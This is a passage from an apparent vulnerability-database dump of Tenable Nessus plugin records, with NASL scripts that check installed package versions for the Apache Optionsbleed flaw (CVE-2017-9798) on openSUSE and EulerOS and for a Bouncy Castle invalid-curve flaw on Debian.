LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103399);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-9798\");\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-2017-1083) (Optionsbleed)\");\n script_summary(english:\"Check for the openSUSE-2017-1083 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for apache2 fixes the following security issue :\n\n - CVE-2017-9798: Prevent use-after-free use of memory that\n allowed for an information leak via OPTIONS\n (bsc#1058058).\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1058058\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-debuginfo-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-debugsource-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-devel-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-event-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-event-debuginfo-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-example-pages-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-prefork-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-prefork-debuginfo-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-utils-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-utils-debuginfo-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-worker-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-worker-debuginfo-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-debuginfo-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-debugsource-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-devel-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-event-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-event-debuginfo-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-example-pages-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-prefork-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-prefork-debuginfo-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-utils-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-utils-debuginfo-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-worker-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-worker-debuginfo-2.4.23-16.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2 / apache2-debuginfo / apache2-debugsource / apache2-devel / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:01:44", "description": "According to the version of the httpd packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-11-01T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP1 : httpd (EulerOS-SA-2017-1252)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:httpd", "p-cpe:/a:huawei:euleros:httpd-devel", "p-cpe:/a:huawei:euleros:httpd-manual", "p-cpe:/a:huawei:euleros:httpd-tools", "p-cpe:/a:huawei:euleros:mod_ssl", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1252.NASL", "href": "https://www.tenable.com/plugins/nessus/104277", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104277);\n script_version(\"3.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-9798\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : httpd (EulerOS-SA-2017-1252)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the httpd packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - A use-after-free flaw was found in the way httpd\n handled invalid and previously unregistered HTTP\n methods specified in the Limit directive used in an\n .htaccess file. A remote attacker could possibly use\n this flaw to disclose portions of the server memory, or\n cause httpd child process to crash. (CVE-2017-9798)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1252\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d09c3870\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"httpd-2.4.6-45.0.1.4.h8\",\n \"httpd-devel-2.4.6-45.0.1.4.h8\",\n \"httpd-manual-2.4.6-45.0.1.4.h8\",\n \"httpd-tools-2.4.6-45.0.1.4.h8\",\n \"mod_ssl-2.4.6-45.0.1.4.h8\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:02:30", "description": "According to the version of the httpd packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-11-01T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP2 : httpd (EulerOS-SA-2017-1253)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:httpd", "p-cpe:/a:huawei:euleros:httpd-devel", "p-cpe:/a:huawei:euleros:httpd-manual", "p-cpe:/a:huawei:euleros:httpd-tools", "p-cpe:/a:huawei:euleros:mod_ssl", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1253.NASL", "href": "https://www.tenable.com/plugins/nessus/104278", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104278);\n script_version(\"3.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-9798\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : httpd (EulerOS-SA-2017-1253)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the httpd packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - A use-after-free flaw was found in the way httpd\n handled invalid and previously unregistered HTTP\n methods specified in the Limit directive used in an\n .htaccess file. A remote attacker could possibly use\n this flaw to disclose portions of the server memory, or\n cause httpd child process to crash. (CVE-2017-9798)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1253\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?97163687\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"httpd-2.4.6-45.0.1.4.h5\",\n \"httpd-devel-2.4.6-45.0.1.4.h5\",\n \"httpd-manual-2.4.6-45.0.1.4.h5\",\n \"httpd-tools-2.4.6-45.0.1.4.h5\",\n \"mod_ssl-2.4.6-45.0.1.4.h5\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:44:46", "description": "Tibor Jager, Jorg Schwenk, and Juraj Somorovsky, from Horst Gortz Institute for IT Security, published a paper in ESORICS 2015 where they describe an invalid curve attack in Bouncy Castle Crypto, a Java library for cryptography. An attacker is able to recover private Elliptic Curve keys from different applications, for example, TLS servers.\n\nMore information:\nhttp://web-in-security.blogspot.ca/2015/09/practical-invalid-curve-att acks.htmlPractical Invalid Curve Attacks on TLS-ECDH:\nhttp://euklid.org/pdf/ECC_Invalid_Curve.pdf", "cvss3": {}, "published": "2015-12-15T00:00:00", "type": "nessus", "title": "Debian DSA-3417-1 : bouncycastle - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:bouncycastle", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3417.NASL", "href": "https://www.tenable.com/plugins/nessus/87359", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3417. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87359);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-7940\");\n script_xref(name:\"DSA\", value:\"3417\");\n\n script_name(english:\"Debian DSA-3417-1 : bouncycastle - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Tibor Jager, Jorg Schwenk, and Juraj Somorovsky, from Horst Gortz\nInstitute for IT Security, published a paper in ESORICS 2015 where\nthey describe an invalid curve attack in Bouncy Castle Crypto, a Java\nlibrary for cryptography. An attacker is able to recover private\nElliptic Curve keys from different applications, for example, TLS\nservers.\n\nMore information:\nhttp://web-in-security.blogspot.ca/2015/09/practical-invalid-curve-att\nacks.htmlPractical Invalid Curve Attacks on TLS-ECDH:\nhttp://euklid.org/pdf/ECC_Invalid_Curve.pdf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=802671\"\n );\n # http://web-in-security.blogspot.ca/2015/09/practical-invalid-curve-attacks.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?577fd981\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://euklid.org/pdf/ECC_Invalid_Curve.pdf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/bouncycastle\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/bouncycastle\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3417\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the bouncycastle packages.\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 1.44+dfsg-3.1+deb7u1.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.49+dfsg-3+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bouncycastle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libbcmail-java\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcmail-java-doc\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcmail-java-gcj\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcpg-java\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcpg-java-doc\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcpg-java-gcj\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcprov-java\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcprov-java-doc\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcprov-java-gcj\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbctsp-java\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbctsp-java-doc\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbctsp-java-gcj\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbcmail-java\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbcmail-java-doc\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbcpg-java\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbcpg-java-doc\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbcpkix-java\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbcpkix-java-doc\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbcprov-java\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbcprov-java-doc\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:43:36", "description": "The Bouncy Castle Java library before 1.51 does not validate that a point is within the elliptic curve, which makes it easier for remote attackers to obtain private keys via a series of crafted elliptic curve Diffie Hellman (ECDH) key exchanges, aka an 'invalid curve attack.'\n\nFor Debian 6 'Squeeze', this issue has been fixed in version 1.44+dfsg-2+deb6u1 of bouncycastle.\n\nMany thanks to upstream author Peter Dettmann who reviewed the backport that we prepared.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-12-09T00:00:00", "type": "nessus", "title": "Debian DLA-361-1 : bouncycastle security update", 